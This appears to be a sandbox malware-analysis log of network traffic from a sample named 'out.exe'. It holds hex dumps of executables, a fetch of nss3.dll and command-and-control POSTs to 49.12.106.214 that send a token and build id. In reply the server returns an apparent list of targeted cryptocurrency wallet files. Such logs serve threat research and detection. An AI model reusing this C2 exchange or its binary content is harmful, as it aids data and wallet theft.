                                                                                                                                                                                        2024-10-07 18:35:43 UTC16125INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                        2024-10-07 18:35:43 UTC16384INData Raw: 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42
                                                                                                                                                                                        Data Ascii: t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;B
                                                                                                                                                                                        2024-10-07 18:35:43 UTC16384INData Raw: 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20
                                                                                                                                                                                        Data Ascii: EEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt
                                                                                                                                                                                        2024-10-07 18:35:43 UTC16384INData Raw: c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12
                                                                                                                                                                                        Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                                                                                                                        2024-10-07 18:35:43 UTC15603INData Raw: 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f
                                                                                                                                                                                        Data Ascii: @L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicroso


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        16192.168.2.54992449.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:44 UTC194OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:45 UTC261INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:44 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 2046288
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Last-Modified: Monday, 07-Oct-2024 18:35:44 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-10-07 18:35:45 UTC16123INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                        2024-10-07 18:35:45 UTC16384INData Raw: f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51
                                                                                                                                                                                        Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQ
                                                                                                                                                                                        2024-10-07 18:35:45 UTC16384INData Raw: 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b
                                                                                                                                                                                        Data Ascii: Q=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                                        2024-10-07 18:35:45 UTC16384INData Raw: 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d
                                                                                                                                                                                        Data Ascii: @;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                                                                                                                        2024-10-07 18:35:45 UTC16384INData Raw: 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10
                                                                                                                                                                                        Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                                                                                                                        2024-10-07 18:35:45 UTC16384INData Raw: d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00
                                                                                                                                                                                        Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                                                                                                                        2024-10-07 18:35:45 UTC16384INData Raw: 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24
                                                                                                                                                                                        Data Ascii: 8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$
                                                                                                                                                                                        2024-10-07 18:35:45 UTC16384INData Raw: 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff
                                                                                                                                                                                        Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                                                                                                                        2024-10-07 18:35:45 UTC16384INData Raw: e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74
                                                                                                                                                                                        Data Ascii: `P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rtt
                                                                                                                                                                                        2024-10-07 18:35:45 UTC16384INData Raw: 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00
                                                                                                                                                                                        Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        17192.168.2.54994649.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:47 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDG
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 1145
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:47 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 45 47 44 47 49 4a 45 43 47 43 42 47 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 45 47 44 47 49 4a 45 43 47 43 42 47 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 45 47 44 47 49 4a 45 43 47 43 42 47 43 47 48 44 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                        Data Ascii: ------BKJEGDGIJECGCBGCGHDGContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------BKJEGDGIJECGCBGCGHDGContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------BKJEGDGIJECGCBGCGHDGCont
                                                                                                                                                                                        2024-10-07 18:35:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:48 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        18192.168.2.54995349.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:49 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCG
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:49 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                        Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------IIEBGIDAAFHIJJJJEGCGCont
                                                                                                                                                                                        2024-10-07 18:35:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:49 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:50 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
